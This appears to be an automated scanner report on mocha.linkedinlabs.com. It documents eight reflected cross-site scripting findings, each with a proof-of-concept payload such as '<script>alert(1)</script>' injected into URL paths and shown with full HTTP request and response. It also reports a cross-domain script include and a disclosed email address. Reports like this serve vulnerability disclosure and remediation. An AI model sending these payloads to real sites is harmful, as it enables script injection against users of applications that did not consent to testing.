Report generated by XSS.Cx at Wed Aug 08 11:18:54 EDT 2012.

XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, mocha.linkedinlabs.com

Loading

1. Cross-site scripting (reflected)

1.1. http://mocha.linkedinlabs.com/favicon.ico [REST URL parameter 1]

1.2. http://mocha.linkedinlabs.com/public/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css [REST URL parameter 1]

1.3. http://mocha.linkedinlabs.com/public/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css [REST URL parameter 2]

1.4. http://mocha.linkedinlabs.com/public/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css [REST URL parameter 3]

1.5. http://mocha.linkedinlabs.com/public/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css [REST URL parameter 4]

1.6. http://mocha.linkedinlabs.com/public/stylesheets/styles.css [REST URL parameter 1]

1.7. http://mocha.linkedinlabs.com/public/stylesheets/styles.css [REST URL parameter 2]

1.8. http://mocha.linkedinlabs.com/public/stylesheets/styles.css [REST URL parameter 3]

2. Cross-domain script include

3. Email addresses disclosed



1. Cross-site scripting (reflected)  next
There are 8 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organization in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://mocha.linkedinlabs.com/favicon.ico [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mocha.linkedinlabs.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f90f5<img%20src%3da%20onerror%3dalert(1)>13a963a0257 was submitted in the REST URL parameter 1. This input was echoed as f90f5<img src=a onerror=alert(1)>13a963a0257 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.icof90f5<img%20src%3da%20onerror%3dalert(1)>13a963a0257 HTTP/1.1
Host: mocha.linkedinlabs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Length: 10


Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.11
Date: Sun, 08 Jan 2012 02:31:09 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Content-Length: 72

Not found

GET /favicon.icof90f5<img src=a onerror=alert(1)>13a963a0257

1.2. http://mocha.linkedinlabs.com/public/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mocha.linkedinlabs.com
Path:   /public/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1d184<script>alert(1)</script>497c26a9cf1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /public1d184<script>alert(1)</script>497c26a9cf1/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css HTTP/1.1
Host: mocha.linkedinlabs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Accept: text/css,*/*;q=0.1
Referer: http://mocha.linkedinlabs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=46939834.356630948.1325989532.1325989532.1325989532.1; __utmb=46939834.1.10.1325989532; __utmc=46939834; __utmz=46939834.1325989532.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Length: 10


Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.11
Date: Sun, 08 Jan 2012 02:26:15 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Content-Length: 119

Not found

GET /public1d184<script>alert(1)</script>497c26a9cf1/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css

1.3. http://mocha.linkedinlabs.com/public/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mocha.linkedinlabs.com
Path:   /public/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d6bf7<script>alert(1)</script>266986581b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /public/jquery_themesd6bf7<script>alert(1)</script>266986581b8/custom-theme/jquery-ui-1.8.16.custom.css HTTP/1.1
Host: mocha.linkedinlabs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Accept: text/css,*/*;q=0.1
Referer: http://mocha.linkedinlabs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=46939834.356630948.1325989532.1325989532.1325989532.1; __utmb=46939834.1.10.1325989532; __utmc=46939834; __utmz=46939834.1325989532.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Length: 10


Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.11
Date: Sun, 08 Jan 2012 02:26:18 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Content-Length: 138

Not found

The file public/jquery_themesd6bf7<script>alert(1)</script>266986581b8/custom-theme/jquery-ui-1.8.16.custom.css does not exist

1.4. http://mocha.linkedinlabs.com/public/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mocha.linkedinlabs.com
Path:   /public/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 724c1<script>alert(1)</script>1dfcd4b92e0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /public/jquery_themes/custom-theme724c1<script>alert(1)</script>1dfcd4b92e0/jquery-ui-1.8.16.custom.css HTTP/1.1
Host: mocha.linkedinlabs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Accept: text/css,*/*;q=0.1
Referer: http://mocha.linkedinlabs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=46939834.356630948.1325989532.1325989532.1325989532.1; __utmb=46939834.1.10.1325989532; __utmc=46939834; __utmz=46939834.1325989532.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Length: 10


Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.11
Date: Sun, 08 Jan 2012 02:26:22 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Content-Length: 138

Not found

The file public/jquery_themes/custom-theme724c1<script>alert(1)</script>1dfcd4b92e0/jquery-ui-1.8.16.custom.css does not exist

1.5. http://mocha.linkedinlabs.com/public/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mocha.linkedinlabs.com
Path:   /public/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 51f03<script>alert(1)</script>75abe2d05b7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /public/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css51f03<script>alert(1)</script>75abe2d05b7 HTTP/1.1
Host: mocha.linkedinlabs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Accept: text/css,*/*;q=0.1
Referer: http://mocha.linkedinlabs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=46939834.356630948.1325989532.1325989532.1325989532.1; __utmb=46939834.1.10.1325989532; __utmc=46939834; __utmz=46939834.1325989532.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Length: 10


Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.11
Date: Sun, 08 Jan 2012 02:26:25 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Content-Length: 138

Not found

The file public/jquery_themes/custom-theme/jquery-ui-1.8.16.custom.css51f03<script>alert(1)</script>75abe2d05b7 does not exist

1.6. http://mocha.linkedinlabs.com/public/stylesheets/styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mocha.linkedinlabs.com
Path:   /public/stylesheets/styles.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92fa6<script>alert(1)</script>fc54f9e88ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /public92fa6<script>alert(1)</script>fc54f9e88ca/stylesheets/styles.css HTTP/1.1
Host: mocha.linkedinlabs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Accept: text/css,*/*;q=0.1
Referer: http://mocha.linkedinlabs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=46939834.356630948.1325989532.1325989532.1325989532.1; __utmb=46939834.1.10.1325989532; __utmc=46939834; __utmz=46939834.1325989532.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Length: 10


Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.11
Date: Sun, 08 Jan 2012 02:26:07 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Content-Length: 87

Not found

GET /public92fa6<script>alert(1)</script>fc54f9e88ca/stylesheets/styles.css

1.7. http://mocha.linkedinlabs.com/public/stylesheets/styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mocha.linkedinlabs.com
Path:   /public/stylesheets/styles.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload db2a1<script>alert(1)</script>f77d2aee198 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /public/stylesheetsdb2a1<script>alert(1)</script>f77d2aee198/styles.css HTTP/1.1
Host: mocha.linkedinlabs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Accept: text/css,*/*;q=0.1
Referer: http://mocha.linkedinlabs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=46939834.356630948.1325989532.1325989532.1325989532.1; __utmb=46939834.1.10.1325989532; __utmc=46939834; __utmz=46939834.1325989532.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Length: 10


Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.11
Date: Sun, 08 Jan 2012 02:26:10 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Content-Length: 106

Not found

The file public/stylesheetsdb2a1<script>alert(1)</script>f77d2aee198/styles.css does not exist

1.8. http://mocha.linkedinlabs.com/public/stylesheets/styles.css [REST URL parameter 3]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://mocha.linkedinlabs.com
Path:   /public/stylesheets/styles.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8d6bf<script>alert(1)</script>7e621e6e052 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /public/stylesheets/styles.css8d6bf<script>alert(1)</script>7e621e6e052 HTTP/1.1
Host: mocha.linkedinlabs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Accept: text/css,*/*;q=0.1
Referer: http://mocha.linkedinlabs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=46939834.356630948.1325989532.1325989532.1325989532.1; __utmb=46939834.1.10.1325989532; __utmc=46939834; __utmz=46939834.1325989532.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Length: 10


Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.11
Date: Sun, 08 Jan 2012 02:26:13 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Content-Length: 106

Not found

The file public/stylesheets/styles.css8d6bf<script>alert(1)</script>7e621e6e052 does not exist

2. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mocha.linkedinlabs.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfill, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET / HTTP/1.1
Host: mocha.linkedinlabs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.linkedinlabs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=46939834.356630948.1325989532.1325989532.1325989532.1; __utmb=46939834.1.10.1325989532; __utmc=46939834; __utmz=46939834.1325989532.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Length: 10


Response

HTTP/1.1 200 OK
Server: nginx/1.0.11
Date: Sun, 08 Jan 2012 02:25:34 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: PLAY_FLASH=;Expires=Sun, 8-Jan-12 02:25:34 GMT;Path=/
Set-Cookie: PLAY_ERRORS=;Expires=Sun, 8-Jan-12 02:25:34 GMT;Path=/
Set-Cookie: PLAY_SESSION=;Expires=Sun, 8-Jan-12 02:25:34 GMT;Path=/
Cache-Control: no-cache
Content-Length: 4424

<!DOCTYPE html>
<html>
<head>
<title>MOCHA</title>

<link type="text/css" rel="stylesheet" href="/public/stylesheets/styles.css" />
<link type="text/css" rel="stylesheet" href="/public/jquery_
...[SNIP]...
</script>


<script type="text/javascript" src="http://platform.linkedin.com/in.js">
authorize: false,
api_key: uzbtowlsicma
</script>
...[SNIP]...

3. Email addresses disclosed  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mocha.linkedinlabs.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organization's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET / HTTP/1.1
Host: mocha.linkedinlabs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.linkedinlabs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=46939834.356630948.1325989532.1325989532.1325989532.1; __utmb=46939834.1.10.1325989532; __utmc=46939834; __utmz=46939834.1325989532.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Length: 10


Response

HTTP/1.1 200 OK
Server: nginx/1.0.11
Date: Sun, 08 Jan 2012 02:25:34 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: PLAY_FLASH=;Expires=Sun, 8-Jan-12 02:25:34 GMT;Path=/
Set-Cookie: PLAY_ERRORS=;Expires=Sun, 8-Jan-12 02:25:34 GMT;Path=/
Set-Cookie: PLAY_SESSION=;Expires=Sun, 8-Jan-12 02:25:34 GMT;Path=/
Cache-Control: no-cache
Content-Length: 4424

<!DOCTYPE html>
<html>
<head>
<title>MOCHA</title>

<link type="text/css" rel="stylesheet" href="/public/stylesheets/styles.css" />
<link type="text/css" rel="stylesheet" href="/public/jquery_
...[SNIP]...
<a href="mailto:mocha-feedback@linkedin.com?Subject=Mocha%20feedback">
Give us feedback : mocha-feedback@linkedin.com</a>
...[SNIP]...

Report generated by XSS.Cx at Wed Aug 08 11:18:54 EDT 2012.